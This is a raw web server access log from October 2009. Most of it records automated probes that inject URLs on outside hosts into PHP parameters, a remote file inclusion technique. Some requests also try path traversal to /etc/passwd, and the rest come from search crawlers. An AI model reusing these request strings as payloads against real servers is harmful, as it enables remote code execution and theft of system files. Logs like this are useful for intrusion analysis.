203.185.129.36 - - [16/Oct/2009:00:14:50 -0500] "GET /logs/access_log.1242691200/include/main.php?config[search_disp]=include_dir=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
203.185.129.36 - - [16/Oct/2009:00:14:53 -0500] "GET /logs/include/main.php?config[search_disp]=include_dir=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
203.185.129.36 - - [16/Oct/2009:00:14:53 -0500] "GET /include/main.php?config[search_disp]=include_dir=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
203.185.129.36 - - [16/Oct/2009:00:14:53 -0500] "GET /logs/access_log.1238112000/include/main.php?config[search_disp]=include_dir=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
91.196.124.10 - - [16/Oct/2009:00:15:36 -0500] "GET //modules/PNphpBB2/printview.php?phpEx=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 314 "-""-"
91.196.124.10 - - [16/Oct/2009:00:15:36 -0500] "GET //modules/PNphpBB2/printview.php?phpEx=./../../../../../../../../etc/passwd HTTP/1.1" 404 314 "-""-"
87.230.85.142 - - [16/Oct/2009:00:16:35 -0500] "GET /appserv/main.php?appserv_root=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:16:35 -0500] "GET /logs/appserv/main.php?appserv_root=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:16:35 -0500] "GET /logs/access_log.1245456000/appserv/main.php?appserv_root=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:16:35 -0500] "GET /appserv/main.php?appserv_root=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:16:35 -0500] "GET /logs/appserv/main.php?appserv_root=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:16:35 -0500] "GET /logs/access_log.1245456000/appserv/main.php?appserv_root=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:16:49 -0500] "GET /logs/access_log.1238803200/appserv/main.php?appserv_root=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:16:52 -0500] "GET /logs/access_log.1238803200/appserv/main.php?appserv_root=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:17:47 -0500] "GET /appserv/main.php?appserv_root=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:17:47 -0500] "GET /logs/appserv/main.php?appserv_root=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:17:47 -0500] "GET /logs/access_log.1238803200/appserv/main.php?appserv_root=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:17:48 -0500] "GET /appserv/main.php?appserv_root=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:17:48 -0500] "GET /logs/appserv/main.php?appserv_root=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:17:48 -0500] "GET /logs/access_log.1238803200/appserv/main.php?appserv_root=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:17:51 -0500] "GET /appserv/main.php?appserv_root=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:17:51 -0500] "GET /logs/appserv/main.php?appserv_root=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:17:51 -0500] "GET /logs/access_log.1238803200/appserv/main.php?appserv_root=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:17:55 -0500] "GET /logs/access_log.1237075200/appserv/main.php?appserv_root=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:17:55 -0500] "GET /logs/access_log.1237075200/appserv/main.php?appserv_root=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:17:57 -0500] "GET /logs/access_log.1237075200/appserv/main.php?appserv_root=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
65.55.207.48 - - [16/Oct/2009:00:20:32 -0500] "GET /logs/access_log.1236729600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.74 - - [16/Oct/2009:00:21:02 -0500] "GET /logs/access_log.1135728000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.196.124.10 - - [16/Oct/2009:00:21:21 -0500] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 329 "-""-"
91.196.124.10 - - [16/Oct/2009:00:21:22 -0500] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 329 "-""-"
65.55.106.208 - - [16/Oct/2009:00:26:01 -0500] "GET /logs/access_log.1214265600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.186 - - [16/Oct/2009:00:27:02 -0500] "GET /logs/access_log.1218240000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.101 - - [16/Oct/2009:00:30:31 -0500] "GET /logs/access_log.1206316800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.37.203 - - [16/Oct/2009:00:31:56 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.133 - - [16/Oct/2009:00:32:32 -0500] "GET /logs/access_log.1231286400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
110.45.145.165 - - [16/Oct/2009:00:35:22 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
110.45.145.165 - - [16/Oct/2009:00:35:22 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
110.45.145.165 - - [16/Oct/2009:00:35:22 -0500] "GET /logs/access_log.1248912000//bemarket/postscript/postscript.php?p_mode=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
110.45.145.165 - - [16/Oct/2009:00:36:02 -0500] "GET /logs/access_log.1248652800//bemarket/postscript/postscript.php?p_mode=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:00:36:25 -0500] "GET /logs/access_log.1252627200/?DOCUMENT_ROOT=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:00:36:26 -0500] "GET /?DOCUMENT_ROOT=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:00:36:26 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:00:36:45 -0500] "GET /logs/?DOCUMENT_ROOT=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 209037 "-""Mozilla/5.0"
65.55.37.203 - - [16/Oct/2009:00:38:08 -0500] "GET /logs/access_log.1182384000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.11.145.8 - - [16/Oct/2009:00:38:41 -0500] "GET /logs/access_log.1252627200/?DOCUMENT_ROOT=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:00:38:41 -0500] "GET /?DOCUMENT_ROOT=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:00:38:42 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:00:39:02 -0500] "GET /logs/?DOCUMENT_ROOT=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 209037 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:00:39:27 -0500] "GET //login.php?dir=http://dubnahome.ru//one.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:00:39:27 -0500] "GET /logs/access_log.1238803200//login.php?dir=http://dubnahome.ru//one.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:00:39:27 -0500] "GET /logs/access_log.1251676800//login.php?dir=http://dubnahome.ru//one.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:00:39:27 -0500] "GET /logs//login.php?dir=http://dubnahome.ru//one.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:00:39:58 -0500] "GET /logs/access_log.1243987200//phpAdsNew/view.inc.php?=http://dubnahome.ru//one.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:00:39:58 -0500] "GET /logs//phpAdsNew/view.inc.php?=http://dubnahome.ru//one.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:00:39:58 -0500] "GET //phpAdsNew/view.inc.php?=http://dubnahome.ru//one.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:00:39:58 -0500] "GET /logs/access_log.1246665600//phpAdsNew/view.inc.php?=http://dubnahome.ru//one.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
65.55.207.126 - - [16/Oct/2009:00:48:32 -0500] "GET /logs/access_log.1206403200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.230.85.142 - - [16/Oct/2009:00:51:05 -0500] "GET /logs/access_log.1253318400/include/main.php?config[search_disp]=include_dir=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
199.103.56.18 - - [16/Oct/2009:00:53:50 -0500] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://bokep.com? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
199.103.56.18 - - [16/Oct/2009:00:53:50 -0500] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://bokep.com? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.11.145.8 - - [16/Oct/2009:01:01:03 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:01:03 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:01:03 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.207.100 - - [16/Oct/2009:01:01:31 -0500] "GET /logs/access_log.1191456000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.53 - - [16/Oct/2009:01:03:02 -0500] "GET /logs/access_log.1135123200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.203 - - [16/Oct/2009:01:03:32 -0500] "GET /logs/access_log.1147910400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.11.145.8 - - [16/Oct/2009:01:04:15 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:04:15 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:04:15 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
65.55.106.183 - - [16/Oct/2009:01:08:33 -0500] "GET /logs/access_log.1151625600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.48.121.149 - - [16/Oct/2009:01:14:31 -0500] "GET ///modules/4nAlbum/public/displayCategory.php?basepath=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.48.121.149 - - [16/Oct/2009:01:14:31 -0500] "GET /logs/access_log.1248480000///modules/4nAlbum/public/displayCategory.php?basepath=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.48.121.149 - - [16/Oct/2009:01:14:33 -0500] "GET /logs///modules/4nAlbum/public/displayCategory.php?basepath=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
82.193.15.3 - - [16/Oct/2009:01:15:28 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
82.193.15.3 - - [16/Oct/2009:01:15:33 -0500] "GET /logs/access_log.1245024000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
82.193.15.3 - - [16/Oct/2009:01:15:37 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
82.193.15.3 - - [16/Oct/2009:01:15:37 -0500] "GET /logs/access_log.1244851200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
82.193.15.3 - - [16/Oct/2009:01:15:47 -0500] "GET /logs/access_log.1246233600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.48.121.149 - - [16/Oct/2009:01:15:54 -0500] "GET /logs/access_log.1234051200///modules/4nAlbum/public/displayCategory.php?basepath=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:16:33 -0500] "GET //config/dbutil.bck.php?confdir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:16:33 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:16:33 -0500] "GET /logs/access_log.1234137600//config/dbutil.bck.php?confdir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:16:35 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:16:35 -0500] "GET /logs/access_log.1234137600//config/dbutil.bck.php?confdir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:16:36 -0500] "GET //config/dbutil.bck.php?confdir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:01:16:55 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dubnahome.ru//one.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:01:16:55 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dubnahome.ru//one.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:01:16:55 -0500] "GET /logs/access_log.1239753600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dubnahome.ru//one.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:01:17:02 -0500] "GET /logs/access_log.1247356800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dubnahome.ru//one.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
203.185.129.36 - - [16/Oct/2009:01:17:08 -0500] "GET //phpicalendar/day.php?path=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
203.185.129.36 - - [16/Oct/2009:01:17:08 -0500] "GET /logs//phpicalendar/day.php?path=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
203.185.129.36 - - [16/Oct/2009:01:17:08 -0500] "GET /logs/access_log.1247875200//phpicalendar/day.php?path=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
203.185.129.36 - - [16/Oct/2009:01:18:05 -0500] "GET /logs/access_log.1242518400//phpicalendar/day.php?path=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
222.236.47.182 - - [16/Oct/2009:01:18:23 -0500] "GET /logs/access_log.1234137600/bbs/skin/zero_vote/login.php?dir=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
222.236.47.182 - - [16/Oct/2009:01:18:23 -0500] "GET /logs/bbs/skin/zero_vote/login.php?dir=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
222.236.47.182 - - [16/Oct/2009:01:18:23 -0500] "GET /bbs/skin/zero_vote/login.php?dir=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
222.236.47.182 - - [16/Oct/2009:01:18:41 -0500] "GET /logs/access_log.1231718400/bbs/skin/zero_vote/login.php?dir=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:01:18:46 -0500] "GET //phpicalendar/day.php?path=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:01:18:46 -0500] "GET /logs/access_log.1247875200//phpicalendar/day.php?path=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:01:18:46 -0500] "GET /logs//phpicalendar/day.php?path=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:01:18:46 -0500] "GET /logs/access_log.1242518400//phpicalendar/day.php?path=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:01:18:46 -0500] "GET //phpicalendar/day.php?path=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:01:18:46 -0500] "GET /logs//phpicalendar/day.php?path=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:01:18:46 -0500] "GET /logs/access_log.1247875200//phpicalendar/day.php?path=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:01:18:46 -0500] "GET /logs/access_log.1242518400//phpicalendar/day.php?path=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:01:18:48 -0500] "GET //phpicalendar/day.php?path=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:01:18:48 -0500] "GET /logs//phpicalendar/day.php?path=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:01:18:48 -0500] "GET /logs/access_log.1247875200//phpicalendar/day.php?path=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:01:18:48 -0500] "GET /logs/access_log.1242518400//phpicalendar/day.php?path=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:19:03 -0500] "GET /logs/access_log.1244851200//config/dbutil.bck.php?confdir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:19:35 -0500] "GET /logs/access_log.1244851200//config/dbutil.bck.php?confdir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.55.106.208 - - [16/Oct/2009:01:21:31 -0500] "GET /logs/access_log.1212105600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.48.121.149 - - [16/Oct/2009:01:21:47 -0500] "GET /logs///modules/4nAlbum/public/displayCategory.php?basepath=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.48.121.149 - - [16/Oct/2009:01:21:47 -0500] "GET ///modules/4nAlbum/public/displayCategory.php?basepath=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.48.121.149 - - [16/Oct/2009:01:21:48 -0500] "GET /logs/access_log.1248480000///modules/4nAlbum/public/displayCategory.php?basepath=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
65.55.207.23 - - [16/Oct/2009:01:22:02 -0500] "GET /logs/access_log.1239667200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
206.225.23.4 - - [16/Oct/2009:01:22:17 -0500] "GET /logs/access_log.1228694400///modules/4nAlbum/public/displayCategory.php?basepath=http://www.sanagustin.edu.bo/modules/copyright??? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
206.225.23.4 - - [16/Oct/2009:01:22:17 -0500] "GET ///modules/4nAlbum/public/displayCategory.php?basepath=http://www.sanagustin.edu.bo/modules/copyright??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
206.225.23.4 - - [16/Oct/2009:01:22:17 -0500] "GET /logs///modules/4nAlbum/public/displayCategory.php?basepath=http://www.sanagustin.edu.bo/modules/copyright??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
193.47.80.46 - - [16/Oct/2009:01:22:28 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.46 - - [16/Oct/2009:01:22:28 -0500] "GET / HTTP/1.1" 200 3245 "-""Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
211.48.121.149 - - [16/Oct/2009:01:23:11 -0500] "GET /logs/access_log.1234051200///modules/4nAlbum/public/displayCategory.php?basepath=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:01:23:39 -0500] "GET /logs//skin/happycast_category_crimson/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:01:23:39 -0500] "GET //skin/happycast_category_crimson/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:01:23:39 -0500] "GET /logs/access_log.1231372800//skin/happycast_category_crimson/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:01:25:34 -0500] "GET //skin/happycast_category_crimson/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:01:25:34 -0500] "GET /logs//skin/happycast_category_crimson/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:01:25:34 -0500] "GET /logs/access_log.1232064000//skin/happycast_category_crimson/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:01:25:35 -0500] "GET /logs/access_log.1243814400//phpicalendar/day.php?path=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:01:25:36 -0500] "GET /logs/access_log.1243814400//phpicalendar/day.php?path=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:01:26:48 -0500] "GET /logs/access_log.1238284800//skin/happycast_category_crimson/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
65.55.207.120 - - [16/Oct/2009:01:30:32 -0500] "GET /logs/access_log.1192838400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.11.145.8 - - [16/Oct/2009:01:31:22 -0500] "GET //bbs//skin/zetyx_grayscale/login.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:31:22 -0500] "GET /logs/access_log.1251417600//bbs//skin/zetyx_grayscale/login.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:31:23 -0500] "GET /logs//bbs//skin/zetyx_grayscale/login.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
65.55.106.132 - - [16/Oct/2009:01:32:32 -0500] "GET /logs/access_log.1106784000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.206.120.162 - - [16/Oct/2009:01:33:32 -0500] "GET /logs//voir.php?inc=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:01:33:32 -0500] "GET //voir.php?inc=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
